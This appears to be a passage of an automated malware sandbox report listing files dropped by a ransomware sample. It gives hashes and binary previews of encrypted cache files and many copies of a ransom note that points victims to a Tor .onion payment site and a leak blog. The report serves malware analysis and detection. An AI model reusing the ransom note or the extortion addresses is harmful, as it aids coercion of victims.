                        Preview:....`.a....L....G.hA....)o....,&.!.K.f.y*..,.4....J.1. r.?..6C....X.&..1......o.....rn...T.X.bK...U......R%_.L..C...}x.H#`).d..F..k._.d+5.I.E..i.B......E...L..(..J....H..[..&..P.b....C~....z...x>9..e.D.W....W](N.'.._....z.}\...1]....7a...=.L.e.....]J.&......4@P....B...'.........)8...30n}rQXaG42..]...t..g..<..1bj....H`..ON.iH.V...r..^c..1.].....gr...A.@.r\&.....J.N......O{...^.3.....X..{."...Q2)..D.`.8.V..s~.)....@.._Si.... .1....a.g...Z$b+Y..,.....".....L....9..pk..M.F.._..@F'.;K...h...xV...o@..<..+.g.>6E........>bd..z7........h.T..!4.... .....IGo..#7..P_x....F....H..FFRay.......f.:..8lQ.Q.............I..1....N7'...N..Q.t+Q2I...a.E'...Y.<.q.n. .N.zO8....G....MRV..Hy.Zuj7=#..g.w..c...eW]S....|c5.V..$..RtIc.f..r$.1..}o\h]7.K;.@.J.F...g.z....5..J...."1..c....l.$..P..?2.Q.....q.......K~.D.m..0.d...".h.7..'l8Q..C.P.._e.m.odY....b..,..'5.'6^H>..46....R5.....`.:........sj....W.....Kk...n...3...l.^.o...[<...1t.D...,Pr.].ib..'.h..g-....;7S......Y..z.....'g

                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\ConvergedLoginPaginatedStrings.en-gb_RP-iR89BipE4i7ZOqiqEgQ2[1].js

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):36711
                        Entropy (8bit):7.995100114881419
                        Encrypted:true
                        SSDEEP:768:Ha40wfLkBx7BeBSnBIAcF+wkEwVwtrcLQ:ywgBzeBSGAcAwqU
                        MD5:D7B4C367E35460E8163260A1A1E2D18F
                        SHA1:23EF87A383225BE020E609B369B7B34EDE8BDA0D
                        SHA-256:C821490ECBD73E7549E34093CB9EB71D7CB21A4224216C83B87C76659A3FE75E
                        SHA-512:C8E8D2B3718065E050E7A9D04E36CECCA5F3209B434AB58A6CA4208DC2EE0D457D39DE3D0AAE7D976C6C37D0CFA9BF2188D6FC44860D05AEFDA517B214BFBE86
                        Malicious:true
                        Preview:|...i.'.g.JQ.i..V.i..Y.!.(....~.%G...o.q.%....).~.....?_....B.`5{.. ..thx....%.v.....o.`...x.....P..&..v...8*.2.cG../G.{CQF.\...w0.*.2..r.rH.o.....r..3.k.q..........KJo..G&..~I.x.".t...=..!..?........}-. oC.jj8...a..4S.......OR.t9..ta.......*...or~..:n.....zy.@...Z..R).. t..N.......n...?J4Sj...:.*,..3.-..>ye..[\.4_.W...(;...wyi.0.1......U.k8.".)U|..N.....N.....5.4..]Yh. .&.M......^=A.##...A...K...n9>..^S.r.U.........}gv......l......N.N..{..*z.../Z....~.bu.hc.V.>W""..&.H......r.1.m6.vm.....}o...]J.....k.y..@.4.+G.....nzMJ........om3.."E.*!......d.%.....].........?........y.i.^.e.....80.......#...n..N&..&.M....u.L6..)..R.W.LV....3.....HcF)...J.~<r...w..0...v5.P......kU...@...fg.../.Or7~.\.....r....){K.p...C...L....~...........w.B]...#......x...D.*@...Y..A.q.Y../...)f.%..<..Cc..8............N....~...a..../}...[!k..0D.[.0O.F.D....:..`.`.b.C=I..ZB?.-.E'E.h...ni..w.2?.J?y......pv;...q..5l..g.Fr..MW..PI.;..._....9.......!.Q.(..1.W'R"Ky

                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\ConvergedLoginPaginatedStrings.en-gb_BxKM4IRLudkIao5qoVhSFA2[1].js

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):37880
                        Entropy (8bit):7.995882121878925
                        Encrypted:true
                        SSDEEP:768:AlBZASgRW0clmuv5Fo9jCd52cUZyycvwBYHJfFmvgHAzRABhd:gTdoEFo9jCj2cUZyzUYHJdaggzRid
                        MD5:686FF81166DEAB5069CEAA71A3FDFB7B
                        SHA1:7AED1198C7BF4D96C04935F315124423F55E5923
                        SHA-256:C587BAF1B967445ADA91F28055C3FE17745E46AD22F343BDE025EF432ECA3B27
                        SHA-512:0BE53C64AA363EC1041D5DF816B39BECF87828376A53AC43561A5C87000FF76C15902A50BA6A4F886C2BC0C53AC7AD7E8228A2171B16C665019D1F602FCBE2DA
                        Malicious:true
                        Preview:..... ."..b.a....0..@c==xK.hp.h.B7..@..{.0T..A7..&k..(....n)..=...e........./.IjP..L.}.i.....&}T...O./d..W1... .9.....5..*..J. ............. .,8g...rn.z..Yo..I........C..D.(F..9.N.*..4.........}..B..&:..Htu.m(9.t.{..u.g.Dr6..g...8..A!........M.1.z".R.M...=+...:.5.}X.k@.{.%.G*|0....[..N.mC.X.0...y..T/]af*.~-.~......B(.....8]pw.i...9"...a.1.~}.4.5ZS..r.M..4..'nQj/kx F..........._{...w...;#..s..0...d).`..qI;......t"..@G..."G.O...9Wv.....I&]...r.f-...z.....I.....~..S.......3.U...N.c.T>e.......p..K=P.....j....J..}8P..).i|H.edJI..y...... .]]fV!.....v<Q....Mi...K/.;'.~."...I.\!N.cu.,<].*..R'....~d#<.YNIi..g..g.Ei........B......&;u..Bd.........iF...9CYG.I....82dA.Y...9.Sr....6.......&.3da.bA...g.9..o.........<.....D<O@.].~6.05h`..5./."*e.U$.].,....~?..._.,c...Q....?.x/q.?.,b.....!..g.......YO.5.N....} ..x..P...,g.z...Q.y...b..p#..$.....R.....}....._...t25.Xh.g..e....K.........S.....\P.J%.EI.A.....G.cV.c.E0.....w......s2d.-..Gg....O.

                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\PreSignInSettingsConfig[1].json

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):64962
                        Entropy (8bit):7.9972539152069455
                        Encrypted:true
                        SSDEEP:1536:R/TTwJX+9G3HaQzkCepHNTdJOHm3+/L38PHsd2HmS6:RXwx+9G367C8fJOHl/Uh6
                        MD5:704CB9752FB0556D6DE235CC646C5284
                        SHA1:795AECC87EBB4972162FD6504BA6CE547FC42F18
                        SHA-256:8D219F19C229749146F81E3E31075B905E0A25865278DEBC7685E27DFB66C2D6
                        SHA-512:19A527F92EBA031670BC847E23FB4FCF3A6355D0E69DA6E64C1745F25CEB895FF7FF85802DC62BCFC7BA63DB03F568D8E2D5F3BD5E7C4B16993DC92A3E43B84E
                        Malicious:true
                        Preview:p...Q..d......c.U~Y.E.M.^..(..N..%Y........w........W.>n.B..'.L..Z-.XX..9.x.b...Ux..D.ha...{.........RnE.....5n......9.{.qd.|.....Q:E....M.Q..-N.j7....?..p.A..\nO..r`*.e......#..b.g...>..8.>[g...H;n-WWP...Ww...#,.....M...|.V...}..r.1.L........`b...g..#"..2.V.D......`.O.&T.EE[AQ.....p..2...IM......Y..+A..M#..._nnp+.$f..3y.u.....Ap....;.B..Z.pH.(RdZ.n..O.}.Tj..........D....5=.4..q^1....;.V...rO...)..h..U.N.iA..,..y.f..C......6>w...S...+.3.Xo.:.il..t..$F.6.I.8d..y.TV0.[.X........o..3..l.p.O........m.[C6Y...3i.@R*.W...>....-z.}..exE{...?.$.,tv{*..X[..LJ...[.\..j...Y.8..44;....#..b.........a"....N\.. .]..Y..0......Q...M.../0.....U5 6Z(../...ob......{...j.......B.....z...9S.....h..j.'.....L4.........k.Mr...r............'....E.....5.q+...:.5..ld.... 0.r..1[..[.'...s...F....v2u..........g.m.......=..:.....p...^-....:U.E..'....m.b..*....ukS.1Lfv)......B/....N.l...^O..y.<<.G.K.Q..jA_.."......4.....d...pc.ov.Z.r..C3R.LExIP.)..e........s

                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\oneDs_f2e0f4a029670f10d892[1].js

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:OpenPGP Public Key
                        Category:dropped
                        Size (bytes):190260
                        Entropy (8bit):7.996486661478776
                        Encrypted:true
                        SSDEEP:3072:FpeTuQh2IL0ueHWIAiJnKpVwtH+a2PW6lOCCbynvXfvjmoBP0zUEhvwdzbdPW+qm:FpMuQh2AJcKu2PWfbyPfvVEidzbdlP
                        MD5:3F6ABADACC75A16C85617C41A29F0278
                        SHA1:606D8D14ACCBB416A08A247188052555610CA2F7
                        SHA-256:E67AA3994A7FFFA4B9277989D1D2E0FC32B3CB05A586324157A5F8AAE7A58AC8
                        SHA-512:DBCEA8C4C7F91358AE4421CA6AD2AB4DEB9A787468488E0B5EE2421343DB5579D42BF7F3591BE4872695A356495402BF4FFD1DE6D86A19E822162D92E844AC46
                        Malicious:true
                        Preview:..o..kW.L..{...R../.u.....u.[T.p.-.;.=&Kv.=..o.1Z.h.M...^.2e.I..9x..,.....=...J...Z..jq;...:.wh[&Yx.5...[f..)l1b(...9.z.A...[.P......B.f.>.N.....BtP.P..l.V...j...BZ...O..'N.......^....eU-.HM"E.l...`W0.#..[>.w...u.....@......D.pc7....i..p*..>b~.....+...r..5......&..<.6.$^.5?..JeB6..6....6:mS.Ej G!.5.2.j..M.........WZ..*...d....*3Xi..g...z...|.....,%.(T.. .?.CLR.1.T...F."H.Q_.o]..........kTNe.4Om......'...6.r."....}...Z....f.\......#/U.)..6.........%p....<=.Y.*...T.V..K(.k.f.|..i....\.P4..K.!..G!....?z..Xx.....rV...|.X.{^T1.J.....oQK<..x.p/.L.......i.A..5.'.@2..vY0..?;.Hc.Zf.aW.z..... .f....,.....t...nw5RN..a..T[...e*-..%..p=..U..\...'F&4...M:.-..j........#P...0.*<O8.OiW...t_Wfd.'(._..>....o...;q...T.b.....o..4.\:.>..m.].o.."..o..U;....4z.....*.W.9+.3...-....0...<.F.....2H.n.."+w.....].5..Q.6.8.....ey}._.~....c<....z....,%..C....$...&.O....m....&[.........pD$~.O..$....C....SC...s...Y.{Mdm*...$|.8.e......D..4..7/.._..,C..;...~e.......(.s>.\.

                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\DNTException\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\DNTException\Low\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\ESE\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\Low\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\PrivacIE\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\PrivacIE\Low\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\input\af-ZA\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\input\ar-AE\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\input\ar-BH\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\input\ar-DZ\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\input\ar-EG\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\input\ar-IQ\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
